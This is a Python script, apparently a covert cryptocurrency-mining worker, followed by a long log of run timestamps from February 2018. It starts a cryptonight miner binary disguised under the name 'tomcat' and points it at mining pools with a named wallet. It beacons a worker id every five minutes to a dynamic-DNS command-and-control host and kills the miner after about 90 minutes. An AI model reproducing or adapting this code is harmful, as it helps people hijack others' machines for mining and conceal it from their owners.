import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:26:07.067038
#2018-02-17 16:13:05.450002
#2018-02-17 17:59:07.475124
#2018-02-17 19:48:05.729174
#2018-02-17 21:37:04.520651
#2018-02-17 23:21:07.186217
#2018-02-18 01:11:01.291878
#2018-02-18 02:58:03.667209
#2018-02-18 04:46:05.442926
#2018-02-18 06:37:05.109061
#2018-02-18 08:26:02.060250
#2018-02-18 10:13:04.059813
#2018-02-18 11:59:07.781344
#2018-02-18 13:45:09.809952
#2018-02-18 15:36:06.702014
#2018-02-18 17:23:05.175246
#2018-02-18 19:12:06.166041
#2018-02-18 20:58:04.874388
#2018-02-18 22:43:05.667488
#2018-02-19 00:32:01.337796
#2018-02-19 02:16:08.212993
#2018-02-19 04:03:06.419851
#2018-02-19 05:47:03.649459
#2018-02-19 07:34:06.480777
#2018-02-19 09:24:05.010600
#2018-02-19 11:13:07.706752
#2018-02-19 13:01:02.073255
#2018-02-19 14:48:01.951618
#2018-02-19 16:36:01.884788
#2018-02-19 18:22:08.667245
#2018-02-19 20:09:01.853712
#2018-02-19 21:59:05.965093
#2018-02-19 23:44:06.033382
#2018-02-20 01:31:05.517533
#2018-02-20 03:19:06.075971
#2018-02-20 05:05:08.504253
#2018-02-20 06:48:05.912883
#2018-02-20 08:34:01.785244
#2018-02-20 10:18:05.614493
#2018-02-20 12:03:07.186749
#2018-02-20 13:49:12.523288
#2018-02-20 15:34:11.421291
#2018-02-20 17:19:09.027793
#2018-02-20 19:10:03.257576
#2018-02-20 20:58:09.285027
#2018-02-20 22:42:06.472789
#2018-02-21 00:24:04.790343
#2018-02-21 02:11:01.823433
#2018-02-21 03:58:06.873338
#2018-02-21 05:47:06.961213
#2018-02-21 07:36:01.421761
#2018-02-21 09:20:09.641978
#2018-02-21 11:09:09.442224
#2018-02-21 12:57:08.442355
#2018-02-21 14:44:11.416132
#2018-02-21 16:31:10.493888
#2018-02-21 18:22:07.605379
#2018-02-21 20:07:07.780183
#2018-02-21 21:55:09.517675
#2018-02-21 23:45:09.429090
#2018-02-22 01:36:01.943082
#2018-02-22 03:23:07.103782
#2018-02-22 05:10:08.932640
#2018-02-22 06:54:05.677683
#2018-02-22 08:42:07.365066
#2018-02-22 10:29:08.043103
#2018-02-22 12:14:04.773706
#2018-02-22 13:59:08.530733
#2018-02-22 15:46:05.856393
#2018-02-22 17:33:06.884887
#2018-02-22 19:19:06.920930
#2018-02-22 21:12:02.042844
#2018-02-22 22:56:06.955122
#2018-02-23 00:43:01.578262
#2018-02-23 02:31:07.914316
#2018-02-23 04:19:03.919499
#2018-02-23 06:06:05.369647
#2018-02-23 07:51:06.610938
#2018-02-23 09:53:06.082528
#2018-02-23 11:57:09.096278
#2018-02-23 13:45:09.393445
#2018-02-23 15:35:07.994652
#2018-02-23 17:23:04.187480
#2018-02-23 19:08:03.601169
#2018-02-23 20:54:01.560661
#2018-02-23 22:42:03.220462
#2018-02-24 00:29:08.279012
#2018-02-24 02:20:02.476222
#2018-02-24 04:08:07.797250
#2018-02-24 05:56:06.954704
#2018-02-24 07:44:06.326677
#2018-02-24 09:30:01.545838
#2018-02-24 11:23:06.150048
#2018-02-24 13:13:03.454118
#2018-02-24 15:03:04.831119
#2018-02-24 16:52:05.313404
#2018-02-24 18:40:07.473437
#2018-02-24 20:30:09.998349
#2018-02-24 22:28:06.384341
#2018-02-25 01:37:07.218206
#2018-02-25 05:13:06.747016
#2018-02-25 11:09:01.815232